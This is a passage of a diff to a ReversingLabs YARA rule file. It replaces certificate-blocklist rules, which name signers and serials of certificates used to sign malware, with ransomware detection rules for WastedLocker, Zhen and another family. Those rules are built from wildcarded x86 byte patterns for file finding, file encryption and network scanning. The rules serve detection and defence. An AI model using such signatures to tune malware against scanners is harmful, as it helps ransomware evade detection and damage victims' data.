+            88 ?? ?? ?? ?? FF D1 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 85 C0 0F 84 52 01 00 00 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 8B 02 50 8B 4D ?? 8B 51 ?? 52 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 0A 01 00 00 8B 55 ?? 8B 42 ?? 83 E8 ?? 89 45 ?? 8B 4D ?? D1 E1
+            89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CC 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 76 8B 55 ??
+            3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5F 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 6A ?? 8B 45 ?? 50 6A ?? 8B 4D
+            ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 21 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 15 83 7D ?? ?? 74 0D 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? EB 0E EB 02 EB 0A 83 7D ??
+            ?? 0F 84 54 FF FF FF 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ??
+        }
+		$v30_3_encrypt_file_3 = {
+            ?? 8B 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 47 8B 4D ?? 81 E1 ??
+            ?? ?? ?? 74 3C 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ??
+            50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D ?? ?? 75 20 68 ?? ?? ?? ?? 8B
+            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
+            8B 45 ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Gigabit Times Technology Co., Ltd" and pe.signatures [ i ] . serial == "77:a6:47:59:f1:27:66:e3:63:d7:79:99:8c:71:bd:c9" and 1301011199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_1_find_file_1 and $v30_1_find_file_2 and $v30_1_encrypt_file_1 and $v30_1_encrypt_file_2 and $v30_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v30_2_encrypt_file_1 and $v30_2_encrypt_file_2 and $v30_2_encrypt_file_3 ) or ( ( $v20_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v20_1_encrypt_file_1 and $v20_1_encrypt_file_2 and $v20_1_encrypt_file_3 ) or ( ( $v30_entrypoint at pe.entry_point ) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_3_find_file_1 and $v30_3_find_file_2 and $v30_3_encrypt_file_1 and $v30_3_encrypt_file_2 and $v30_3_encrypt_file_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0B0D17Ec1449B4B2D38Fcb0F20Fbcd3A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wastedlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WastedLocker ransomware."
 		author = "ReversingLabs"
-		id = "4484b00d-8fad-5f8f-9030-67216f2820a3"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "68090960-9878-5836-8caa-bf8f408a474e"
+		date = "2020-12-07"
+		modified = "2020-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2338-L2354"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Wastedlocker.yara#L1-L86"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3121f2c49d0d4c396023924521f2c980045b6f07d082e49447429e9cd640e0ef"
+		logic_hash = "0899d3cc3bcea8eae60689a54f34e57bdc52088c879c8420b8e6d0b1969cb186"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WastedLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 83 65 ?? ?? 57 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 53 8B 5D ?? 8D 04 41 89 45 ??
+            C7 00 ?? ?? ?? ?? 8B 43 ?? 57 51 89 45 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 0F 84
+            ?? ?? ?? ?? 56 8D 47 ?? 66 83 38 ?? 75 ?? 0F B7 4F ?? 66 85 C9 0F 84 ?? ?? ?? ?? 66
+            83 F9 ?? 75 ?? 66 83 7F ?? ?? 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F0
+            8D 14 0E B8 ?? ?? ?? ?? 3B D0 89 55 ?? 0F 83 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ??
+            8B 45 ?? 85 C0 74 ?? 83 7F ?? ?? 75 ?? 39 47 ?? 0F 82 ?? ?? ?? ?? 8D 44 36 ?? 50 8D
+            47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50
+            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 E8
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 03 C6 8D 44 00 ?? 83 C0 ?? 50 6A ?? FF
+            35 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 6A
+            ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 8D 44 00 ?? 50 FF 75 ?? 8D 46 ?? 50 89 76 ?? 89 36 E8
+            ?? ?? ?? ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 07 89 46 ?? 8B 47 ?? 89 46 ?? 8B
+        }
+		$find_files_p2 = {
+            47 ?? 89 46 ?? 8B 47 ?? 89 46 ?? 8B 47 ?? 83 C4 ?? 89 46 ?? 83 3B ?? 74 ?? 53 FF 15
+            ?? ?? ?? ?? 8D 43 ?? 8B 48 ?? 89 06 89 4E ?? 89 31 89 70 ?? FF 43 ?? 83 7B ?? ?? 74
+            ?? 8B 43 ?? 83 F8 ?? 75 ?? FF 73 ?? FF 15 ?? ?? ?? ?? 83 3B ?? 0F 84 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? F6 45 ?? ?? 74 ?? 8D 4C 0E ?? 3B
+            C8 73 ?? 8D 04 36 50 8D 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 8D 04 41
+            66 83 60 ?? ?? 83 C4 ?? 83 7D ?? ?? 66 C7 00 ?? ?? 74 ?? 83 C1 ?? 51 8B 4D ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? 8B 4D ?? FF 75 ?? 8B 45 ?? 53 FF 75 ?? 8D 44 06 ?? FF 75 ?? 50
+            51 E8 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? F6 45 ?? ??
+            74 ?? 83 65 ?? ?? 83 7D ?? ?? 75 ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 43
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5B EB
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 5F C9 C2
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 8B 3D ?? ?? ?? ?? FF 75 ?? FF D7 85 C0
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 75 ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? F6 C3 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? 33 DB 85 DB 89 5D ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ??
+            ?? ?? ?? 89 45 ?? EB ?? 83 65 ?? ?? 33 C9 39 4D ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 39 4D ?? 74 ?? 8B 45 ?? 8B 10 8B 40 ?? C1 65 ?? ?? 89 55 ?? 89 45
+            ?? EB ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 4D ?? 8B 45 ?? 89 45 ?? 89 4D ?? 89 4D ??
+            8B 5D ?? 33 F6 8B 45 ?? 85 C0 89 45 ?? 74 ?? 3B D8 73 ?? 89 5D ?? 2B 45 ?? 89 45 ??
+            75 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 7D ?? 8D 45 ?? 50 57 8D 47 ?? 50 FF 75
+            ?? 8B 45 ?? 03 C6 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 03 75 ?? 85 C0 89 45 ?? 0F
+        }
+		$encrypt_files_p2 = {
+            85 ?? ?? ?? ?? 2B 5D ?? 75 ?? EB ?? 8B 7D ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 33
+            C0 3B 45 ?? 77 ?? 72 ?? 3B 5D ?? 73 ?? 8B C3 EB ?? 8B 45 ?? 29 45 ?? 8B 4D ?? 83 5D
+            ?? ?? 0B 4D ?? 75 ?? 8B 4D ?? 89 4D ?? 03 F0 2B D8 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 4D
+            ?? 0F AC C8 ?? C1 E9 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? F7 E1 29 45 ?? 19 55 ?? 01 45 ??
+            11 55 ?? 83 7D ?? ?? 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 85 C0 89 45 ?? 0F 84 ?? ?? ?? ??
+            8B 7D ?? 8D 47 ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 74 ?? 83 7D ??
+            ?? 74 ?? 8B 4D ?? 8B 45 ?? 8B D1 0B D0 74 ?? 0F AC C1 ?? C1 E8 ?? 83 4F ?? ?? 89 4F
+            ?? 89 75 ?? 39 75 ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39
+            75 ?? 74 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 85 DB 0F 85
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 01 75 ?? 83 55 ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
+            D7 EB ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 5F 5E 5B C9 C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WEBPIC DESENVOLVIMENTO DE SOFTWARE LTDA" and pe.signatures [ i ] . serial == "0b:0d:17:ec:14:49:b4:b2:d3:8f:cb:0f:20:fb:cd:3a" and 1394150399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Fe9404Dc73Cf1C2Ba1450B8398305557 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zhen : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Zhen ransomware."
 		author = "ReversingLabs"
-		id = "17700719-81ea-58d4-87f5-4d5c1b19bf64"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ce6bc48d-934b-582c-8ce7-3dd595cbf5dd"
+		date = "2021-04-28"
+		modified = "2021-04-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2356-L2374"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zhen.yara#L1-L176"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c0132d71de1384f6e534dd154eba88c4a51c43b7dfe984f3064ba4feffa4dd5a"
+		logic_hash = "17b24e7baeccd90b8695eb8d21d9ee4a317806ed7713252d315d06bee3f93e65"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zhen"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8E\\xA6\\xE9\\x97\\xA8\\xE7\\xBF\\x94\\xE9\\x80\\x9A\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE5\\x88\\x86\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" or pe.signatures [ i ] . serial == "fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" ) and 1287360000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1Cb2D523A6Bf7A066642C578De1C9Be4 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "d2c87c29-cb64-5d43-847b-64c888421c1f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2376-L2392"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5a786b9ade5a59b8a1e0bbef1eb3dcb65404dcee19d572dc60f9ec9f45e4755b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B 41 ?? C1 E0 ?? 8B 4D ?? 8B 49 ?? 03 C8 FF 15
+            ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? FF 15 ?? ??
+            ?? ?? 8D 55 ?? 8B 4D ?? 83 C1 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
+            4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
+            E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D
+        }
+		$find_files_p2 = {
+            8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55
+            ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 11 89 95 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B 4D ?? 89 48 ?? 8B 55
+            ?? 89 50 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B
+            4D ?? 89 48 ?? 8B 55 ?? 89 50 ?? 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 91
+            ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? EB ?? 8D
+            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ??
+            ?? C3 C3 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? FF 15 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 52 66 8B 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 6A ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 50 6A ?? 6A ??
+            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66
+            8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B
+            55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 8B
+            02 8B 4D ?? 51 FF 50 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52
+            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 45
+            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 8B 02 50 66 8B 4D ?? 51
+        }
+		$encrypt_files_p2 = {
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? FF 15 ??
+            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 89 45 ?? 83 7D
+            ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ??
+            EB ?? C7 45 ?? ?? ?? ?? ?? 66 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 8D 45 ?? 50 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 8B 08 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 50 8B 45 ?? 8B 08 51 8D 55 ?? 52
+            FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ??
+            FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D
+            ?? FF 15 ?? ?? ?? ?? C3 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15
+            ?? ?? ?? ?? C3 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B
+            45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$scan_network_p1 = {
+            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52
+            FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 4D ?? 51 8B
+            95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? FF
+            15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
+            4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
+            45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D
+            4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
+            8B 08 8B 55 ?? 52 FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
